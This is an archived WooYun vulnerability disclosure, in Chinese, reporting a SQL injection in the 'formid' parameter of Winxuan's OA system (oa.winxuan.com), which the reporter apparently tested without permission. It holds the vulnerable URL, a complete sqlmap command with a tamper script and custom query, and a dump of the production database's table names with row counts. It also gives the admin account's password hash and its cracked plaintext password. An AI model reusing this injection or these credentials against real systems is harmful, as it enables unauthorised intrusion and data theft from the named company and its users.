乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-03: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
今天下楼的时候顺便丢垃圾,丢垃圾的时候发现一个包装袋,上面写着文轩网。然后回来就测试了一下,没想到引发了一场场血案啊
oa.winxuan.com
http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1
formid存在注入
350个库啊,因为sqlmap不能直接显示出来,还是找日记一个一个手动排列的,就冲我这精神给20分吧。
JSPback-end DBMS: OracleDatabase: OAUSER+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+|SCORE | 17936023 || PERMISSIONLINKDOCBASE | 6342260 || LOG | 5749886 || PERMISSIONDETAILDOCBASE | 5503371 || SCORETMP | 1244885 || PERMISSIONDETAILWORKFLOWBASE | 304448 || PERMISSIONLINKWORKFLOWBASE | 293734 || PERMISSIONRULEDOCBASE | 262420 || PERMISSIONRULEWORKFLOWBASE | 262310 || WORKFLOWSTEPFINISHED | 183342 || WORKFLOWINFOFINISHED | 180505 || WORKFLOWOPERATORSFINISHED | 140586 || WORKFLOWLOGFINISHED | 125355 || ATTACH | 66960 || DOCATTACH | 54522 || WORKFLOWSTEP | 39600 || WORKFLOWINFO | 39180 || CATEGORYLINK | 38055 || DOCBASE | 35292 || PASSWORDHISTORY | 29312 || WORKFLOWLOG | 28212 || UFG7S2O41194588032176T | 27140 || EVENT | 19384 || WORKFLOWBASE | 15421 || PERMISSIONLINKPORTALCHANNALS | 15264 || PERMISSIONDETAILPORTALCHANNALS | 15249 || UFF7K8K61221633602612T | 13844 || UFJ3W3S41221633547510T | 13831 || UFL0X4U31236061379146T | 12725 || UFG3W9A31191920098875T | 12613 || LABEL | 11655 || UFG0Y5L41221633619659T | 11579 || UFA1Z8W21221633655798T | 9747 || UFH3E4W91191919765921T | 8970 || RTXU | 8194 || UFC4K0G21221633874179T | 8038 || FORMLAYOUTFIELD | 7956 || SYSUSER | 7922 || LABEL_NEW | 7859 || HUMRES | 7855 || SYSUSER_BAK | 7844 || HUMRES_BAK | 7777 || WORKFLOWOPERATORS | 7491 || UFW1C6R51221634541611T | 6319 || RTXUN | 6146 || UFG7S2O41194588032176 | 5869 || UFF2G8A01191907781421T | 5721 || HUMRES_BACK | 5572 || HUMRESTEMP | 5163 || STATIONINFO | 4112 || Z1 | 3892 || DOCINDIV | 3743 || STATIONLINK | 3491 || FORMFIELD | 3029 || UFG3W9A31191920098875 | 2857 || UFD1I6Q41194245212565 | 2695 || CATEGORY | 2435 || SELECTITEM | 2397 || UFG9O1U31427268735994T | 2397 || UFW1J9T61269934662222T | 2344 || IF_HUMRES | 2226 || UFH3E4W91191919765921 | 2166 || UFF2G8A01191907781421 | 2114 || UFA1Z8W21221633655798 | 1899 || UFF7K8K61221633602612 | 1899 || UFC4K0G21221633874179 | 1896 || UFW1C6R51221634541611 | 1896 || UFG0Y5L41221633619659 | 1894 || UFJ3W3S41221633547510 | 1894 || UFL0X4U31236061379146 | 1740 || UFZ1I5F91427270259217T | 1688 || IF_STATIONINFO | 1462 || ORGUNIT | 1332 || UFW4F2G21430722144985T | 1322 || KHZSJ | 1262 || UFJ4I3S41200992843804T | 1080 || UFA5Y7Z81200990289777T | 1078 || UFL2N6H71200991289728T | 1078 || UFY2Z9J91200993227970T | 1078 || UFO5T9B31200993254436T | 1077 || ORGUNITLINK | 1058 || UFN4Q0D91201065966034T | 1054 || BOOKSHEET | 1050 || SAPQQ | 1032 || RTXP | 1000 || UFI2T4P31385011501902T | 976 || ZZ | 963 || UFH4O4P21434439724854 | 955 || UFY3X5U21214977469835T | 903 || BB | 789 || UFE3V0Z41436239651329T | 752 || UNLOCKUSER | 698 || EXPORT | 677 || UFW1J9T61269934662222 | 640 || DR | 609 || NODEINFO | 592 || UFW4F2G21430722144985 | 539 || PIPENODESTYLE | 536 || UFT6Y0E21239169073156T | 525 || REMINDLOG | 498 || RYDRXX_BAK | 459 || UFR8V0S31201592887615T | 440 || REPORTFIELD | 437 || UFU4Q6L41193280564254T | 433 || DOCTYPE | 394 || REFOBJLINK | 364 || FORMLAYOUT | 361 || DIVPOSITION | 360 || MAILACCOUNT | 348 || REMINDRECEIVEOBJ | 337 || UFI2T4P31385011501902 | 336 || PERMISSIONLINKREPORTDEF | 334 || PORTALMODULES | 325 || UFG9O1U31427268735994 | 319 || UFZ1I5F91427270259217 | 319 || PERMISSIONDETAILREPORTDEF | 316 || PORTALCHANPARAMODULES | 286 || UFA2Q4C21193281172154T | 275 || MENU | 274 || MENUORG | 266 || PORTALMODULECONFIG | 256 || SELECTITEMTYPE | 253 || REMARK | 252 || UFF8U9E81395122755353T | 247 || UFE3V0Z41436239651329 | 243 || WBSTASKHISTORY | 235 || REPORTSEARCHFIELD | 226 || PERMISSIONRULEREPORTDEF | 211 || MYPERMITBAG | 210 || UFJ4I3S41200992843804 | 192 || UFA5Y7Z81200990289777 | 191 || UFL2N6H71200991289728 | 191 || UFO5T9B31200993254436 | 191 || UFY2Z9J91200993227970 | 191 || WBSDOCFLOW | 191 || UFN4Q0D91201065966034 | 188 || PERMISSIONRULEPORTALCHANNALS | 173 || UFK5R2Q01193282788864T | 167 || UFR8V0S31201592887615 | 167 || DELOBJ | 165 || IF_ORGUNIT | 163 || WBSTASK | 149 || FORMINFO | 147 || PORTALCHANPARAS | 144 || RYDRXX_BAK_1222 | 138 || UFY7Y3C31209373252583T | 131 || SYSRESOURCE | 126 || PAGEMENU | 117 || KMTOPIC | 115 || PORTAL | 107 || SYSUSERROLELINK | 106 || UFP6J3X91262843817858T | 104 || PIPEINFO | 102 || REMINDMESSAGEDETAIL | 97 || REMINDSENDOBJ | 97 || UFY3X5U21214977469835 | 97 || KMMAPTOPICLINK | 94 || SYSPERMRESLINK | 93 || PERMITBAG | 92 || UFY3T6F71193289145697T | 90 || SETITEM | 89 || HUMRESCUSTOMIZE | 85 || FORMLINK | 84 || SUBJECT | 84 || TEMP3 | 84 || UFS6J0V21186643740812T | 80 || UFY7Y3C31209373252583 | 79 || SEARCHCUSTOMIZEOPTION | 78 || TEMP1 | 75 || TEMP2 | 75 || CONTEMPFIELD | 74 || UFC4H0T11193280596918T | 70 || HHH | 67 || PERMISSIONRULEPIPEINFO | 65 || REFOBJ | 60 || WBSTASKTEMPLATE | 60 || UFA2Q4C21193281172154 | 58 || UFM8L3N01210227759384T | 58 || UFK5R2Q01193282788864 | 57 || UFC4H0T11193280596918 | 56 || UFU4Q6L41193280564254 | 56 || UFY3T6F71193289145697 | 56 || ADDRESSINFO | 51 || GYSZSJ | 51 || PERMISSIONLINKPROJECT | 50 || PERMISSIONDETAILPROJECT | 49 || UFQ9H8S71395725696697T | 49 || UFB5N0R31434341886193 | 47 || UFG5H0M21319164636037T | 47 || UFK4H5T01278382941766T | 47 || PIPEACCREDIT | 46 || ORGUNITTYPE | 44 || UFT6Y0E21239169073156 | 44 || RYDRXX | 43 || UFM2Y4U41210226662879T | 42 || REPORTDEF | 41 || SYSROLEPERMLINK | 41 || UFE3W8V51196906858771 | 41 || UFE3W8V51196906858771T | 41 || SELFCUSTOM | 37 || UFB9T5N81395985987280T | 36 || UFO3X9Z31395725358932T | 36 || AA | 35 || PORTALTOPIC | 35 || PORTALCHANNALS | 33 || UFE4O5K91191920595703T | 33 || UFX6P3U41214807405359T | 33 || UFP6J3X91262843817858 | 31 || UFS6J0V21186643740812 | 31 || UFF8U9E81395122755353 | 30 || UFE3Q6S51228892267536T | 28 || UFK4H5T01278382941766 | 27 || GYSZSJ_BAK | 25 || PERMISSIONRULEPROJECT | 24 || UFE3Q6S51228892267536 | 24 || UFT8H8N31319164144745T | 23 || UFE4O5K91191920595703 | 22 || UFR9F9Z51276157442595 | 22 || UFR9F9Z51276157442595T | 22 || AUTHORIZEOPERATION | 20 || UFQ9H8S71395725696697 | 20 || KMMAP | 19 || UFM8L3N01210227759384 | 19 || SYSPERMS | 18 || SYSROLE | 18 || UFG5H0M21319164636037 | 18 || WORKFLOWAUTHORIZELOG | 18 || UFU4M7L61205906651800T | 16 || UFC2N9R01208923738836T | 13 || FAVLIST | 12 || SETITEMTYPE | 12 || UFM2Y4U41210226662879 | 12 || UFQ0S2A91259133802297T | 12 || UFX6P3U41214807405359 | 12 || USERMENU | 12 || UFB4P7W91208923277799T | 11 || STATIONLEVELLINK | 10 || REMINDRULE | 9 || UFJ8Z6G41426816778795T | 9 || UFO3X9Z31395725358932 | 9 || UFT8H8N31319164144745 | 9 || VERSIONINFO | 9 || KHZSJ_BAK | 8 || PIPEDOCTYPE | 8 || UFB9T5N81395985987280 | 8 || UFC4B3Q21185525667890T | 8 || UFQ0S2A91259133802297 | 8 || ADDRESSSHEETMAP | 7 || SEARCHCUSTOMIZE | 7 || UFH2S6L11237441705568T | 7 || PORTALTOPICLINK | 6 || PROJECT | 6 || UDTYPE | 6 || UFL7E7V61259822162376T | 6 || UFP3K1Q01267680510921T | 6 || UFU4M7L61205906651800 | 6 || WBSVERSION | 6 || ATTACHMENT | 5 || CONTEMPLATE | 5 || CONTRACTTYPE | 5 || KEYINFO | 5 || UFC3H4A91228892239311T | 5 || UFC4B3Q21185525667890 | 5 || UFC4C3V21193888200526 | 5 || UFC4C3V21193888200526T | 5 || UFG1K2C01237771698639T | 5 || UFJ8Z6G41426816778795 | 5 || UFP3K1Q01267680510921 | 5 || PERMISSIONRULECUSTOMER | 4 || PERMISSIONRULEPRODUCT | 4 || PROJECTTYPE | 4 || UFC2N9R01208923738836 | 4 || UFL7E7V61259822162376 | 4 || UFT1Q4K71237184297382T | 4 || UFW4W9S01237184235289T | 4 || WORKFLOWAGENTINFO | 4 || AUTHTICKETINFO | 3 || UFB4P7W91208923277799 | 3 || UFG9Z3X81392010172464T | 3 || UFI3J3D61186471722328T | 3 || UFJ6Y6W11319179657036 | 3 || UFZ3K0Z41237875272949T | 3 || WBSINFO | 3 || WORKFLOWAUTHORIZE | 3 || PERMISSIONDETAILCONTRACT | 2 || PERMISSIONLINKCONTRACT | 2 || PERMISSIONLINKCUSTOMER | 2 || PERMISSIONLINKPRODUCT | 2 || PERMISSIONRULECONTRACT | 2 || REFOBJMODEL | 2 || UFD1Y7I61319173459654 | 2 || UFI3J3D61186471722328 | 2 || AAA | 1 || ASSETSTYPE | 1 || CUSTOMERTYPE | 1 || ID_RECODE_DONTDELETE | 1 || MAP | 1 || PERMISSIONDETAILASSETS | 1 || PERMISSIONDETAILCUSTOMER | 1 || PERMISSIONDETAILPRODUCT | 1 || PERMISSIONDETAILPROVIDER | 1 || PERMISSIONLINKASSETS | 1 || PERMISSIONLINKPROVIDER | 1 || PERMISSIONRULEASSETS | 1 || PERMISSIONRULEMODEL | 1 || PERMISSIONRULEPROVIDER | 1 || PRODUCTTYPE | 1 || PROVIDERTYPE | 1 || SHOPTYPE | 1 || UFC3H4A91228892239311 | 1 || UFD1Y7I61319173459654T | 1 || UFE6F0Y01186643861921 | 1 || UFE6F0Y01186643861921T | 1 || UFG1K2C01237771698639 | 1 || UFH2S6L11237441705568 | 1 || UFJ6Y6W11319179657036T | 1 || UFS6Z2C81395646749424 | 1 || UFS6Z2C81395646749424T | 1 || UFT1Q4K71237184297382 | 1 || UFV3W4W41395647003213 | 1 || UFV3W4W41395647003213T | 1 || UFW4W9S01237184235289 | 1 || UFZ3K0Z41237875272949 | 1 |+--------------------------------+---------+
因为表太多,不知道管理员账户是那个。可以利用语句直接在sqlmap中查询。默认管理员是sysadmin
C:\Python27\sqlmap>sqlmap.py -u "http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment --batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where longonname='sysadmin'"
e3570e9e977fabb2ac818edc9a6a2e38
解密后为asdlkj321
5000名后台管理信息
小学管理系统,可以看视频等。。大量敏感信息
点到即止,么么哒
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:15 (WooYun评价)
暂无